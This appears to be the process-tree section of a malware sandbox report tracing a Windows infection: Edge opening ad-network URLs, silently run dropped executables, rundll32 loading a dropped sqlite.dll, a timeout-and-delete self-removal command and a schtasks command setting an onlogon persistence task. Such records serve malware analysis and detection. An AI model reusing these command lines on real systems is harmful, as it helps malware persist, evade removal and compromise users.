C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:16⤵PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:16⤵PID:7284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:16⤵PID:4124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:86⤵PID:1724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:86⤵PID:2508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5336 /prefetch:26⤵PID:6508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:16⤵PID:6648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7028 /prefetch:86⤵PID:8112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:16⤵PID:2920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7000 /prefetch:86⤵PID:1692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:16⤵PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:16⤵PID:6212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6744 /prefetch:86⤵PID:6780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3404 /prefetch:86⤵PID:2576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:16⤵PID:7592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:16⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:16⤵PID:3056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3144 /prefetch:86⤵PID:424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,9838950384185354605,15287581322896062289,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4372 /prefetch:16⤵PID:5876
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵PID:1660
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6746f8,0x7ff8de674708,0x7ff8de6747186⤵PID:6936
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514835⤵PID:1936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de6746f8,0x7ff8de674708,0x7ff8de6747186⤵PID:3280
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515135⤵PID:7892
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff8de6746f8,0x7ff8de674708,0x7ff8de6747186⤵PID:3748
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872155⤵PID:7532
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xdc,0x10c,0x7ff8de6746f8,0x7ff8de674708,0x7ff8de6747186⤵PID:6684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6b-00202-02e-fb381-75efdf9f884b6\Rakaegidoly.exe"C:\Users\Admin\AppData\Local\Temp\6b-00202-02e-fb381-75efdf9f884b6\Rakaegidoly.exe"4⤵PID:4884
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lwpl32dm.b0n\GcleanerEU.exe /eufive & exit5⤵PID:2416
-
C:\Users\Admin\AppData\Local\Temp\lwpl32dm.b0n\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\lwpl32dm.b0n\GcleanerEU.exe /eufive6⤵PID:3988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 2647⤵
- Program crash
PID:7796
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m5a2b2ou.oxe\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\m5a2b2ou.oxe\installer.exeC:\Users\Admin\AppData\Local\Temp\m5a2b2ou.oxe\installer.exe /qn CAMPAIGN="654"6⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5204 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\m5a2b2ou.oxe\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\m5a2b2ou.oxe\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632126482 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵
- Enumerates connected drives
PID:6072
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\au34z0jn.4xg\anyname.exe & exit5⤵PID:340
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5532
-
-
C:\Users\Admin\AppData\Local\Temp\au34z0jn.4xg\anyname.exeC:\Users\Admin\AppData\Local\Temp\au34z0jn.4xg\anyname.exe6⤵PID:6884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jku2mbsa.pni\gcleaner.exe /mixfive & exit5⤵PID:7288
-
C:\Users\Admin\AppData\Local\Temp\jku2mbsa.pni\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jku2mbsa.pni\gcleaner.exe /mixfive6⤵PID:2068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 2647⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7076
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4660 -ip 46601⤵PID:5940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4748 -ip 47481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5152 -ip 51521⤵PID:1152
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:5880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 4562⤵
- Program crash
PID:6880
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 1312 -ip 13121⤵PID:3248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5880 -ip 58801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6316
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 5656 -ip 56561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2568
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 412 -p 6784 -ip 67841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5564 -ip 55641⤵PID:6288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4896 -ip 48961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5972 -ip 59721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1212 -ip 12121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6460 -ip 64601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2156 -ip 21561⤵PID:5048
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:3316
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6104 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6180 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:984
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6180 -ip 61801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1152 -ip 11521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6220 -ip 62201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3640
-
C:\Users\Admin\AppData\Local\Temp\824.exeC:\Users\Admin\AppData\Local\Temp\824.exe1⤵
- Suspicious use of SetThreadContext
PID:5364 -
C:\Users\Admin\AppData\Local\Temp\824.exeC:\Users\Admin\AppData\Local\Temp\824.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6132 -ip 61321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5560
-
C:\Users\Admin\AppData\Local\Temp\268A.exeC:\Users\Admin\AppData\Local\Temp\268A.exe1⤵PID:3952
-
C:\Users\Admin\AppData\Local\Temp\268A.exeC:\Users\Admin\AppData\Local\Temp\268A.exe2⤵PID:7820
-
-
C:\Users\Admin\AppData\Local\Temp\268A.exeC:\Users\Admin\AppData\Local\Temp\268A.exe2⤵PID:8176
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7276 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:7364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 4563⤵
- Program crash
PID:7848
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7364 -ip 73641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7584
-
C:\Users\Admin\AppData\Local\Temp\5730.exeC:\Users\Admin\AppData\Local\Temp\5730.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1268
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3988 -ip 39881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3700
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5376 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EF8732CCAEB968581E00EE9D20A04220 C2⤵
- Loads dropped DLL
PID:5428
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D627EBFCF482D1AE4D112CA1F5C75BCD2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4392 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:3968
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 60A8BA0C17705E074B15B60A5F1A62D4 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2068 -ip 20681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1312
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7208 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4848 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1992
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4848 -ip 48481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2784
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6880
-
C:\Users\Admin\AppData\Local\Temp\EC5D.exeC:\Users\Admin\AppData\Local\Temp\EC5D.exe1⤵PID:6360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 2562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7796
-
-
C:\Users\Admin\AppData\Local\Temp\F92F.exeC:\Users\Admin\AppData\Local\Temp\F92F.exe1⤵
- Adds Run key to start application
PID:3052 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3052 -s 16762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7448
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:6016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6360 -ip 63601⤵PID:6900
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 704 -p 3052 -ip 30521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8012
-
C:\Users\Admin\AppData\Local\Temp\1AF1.exeC:\Users\Admin\AppData\Local\Temp\1AF1.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8080
-
C:\Users\Admin\AppData\Local\Temp\2D31.exeC:\Users\Admin\AppData\Local\Temp\2D31.exe1⤵PID:1132
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:7288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1132 -ip 11321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6236
-
C:\Users\Admin\AppData\Local\Temp\3E59.exeC:\Users\Admin\AppData\Local\Temp\3E59.exe1⤵
- Loads dropped DLL
PID:7808 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3E59.exe"2⤵PID:6604
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:1172
-
-
-
C:\Users\Admin\AppData\Local\Temp\46C6.exeC:\Users\Admin\AppData\Local\Temp\46C6.exe1⤵
- Suspicious use of SetThreadContext
PID:6312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6900 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1272
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com2⤵PID:2152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.facebook.com2⤵PID:72
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.twitter.com2⤵PID:6564
-
-
C:\Users\Admin\AppData\Local\Temp\46C6.exeC:\Users\Admin\AppData\Local\Temp\46C6.exe2⤵PID:5508
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6708
-
-
-
C:\Users\Admin\AppData\Local\Temp\5FBE.exeC:\Users\Admin\AppData\Local\Temp\5FBE.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 2602⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\6DF8.exeC:\Users\Admin\AppData\Local\Temp\6DF8.exe1⤵
- Suspicious use of SetThreadContext
PID:1912 -
C:\ProgramData\ZZZZZ.exe"C:\ProgramData\ZZZZZ.exe"2⤵PID:3716
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\DriverMaster.exe3⤵PID:7948
-
C:\Users\Admin\AppData\Local\Temp\DriverMaster.exeC:\Users\Admin\AppData\Local\Temp\DriverMaster.exe4⤵PID:5692
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"' & exit5⤵PID:7680
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:6360
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "EngineDriverMaster" /tr '"C:\Users\Admin\AppData\Local\Temp\EngineDriverMaster.exe"'6⤵
- Creates scheduled task(s)
PID:4132
-
-
-
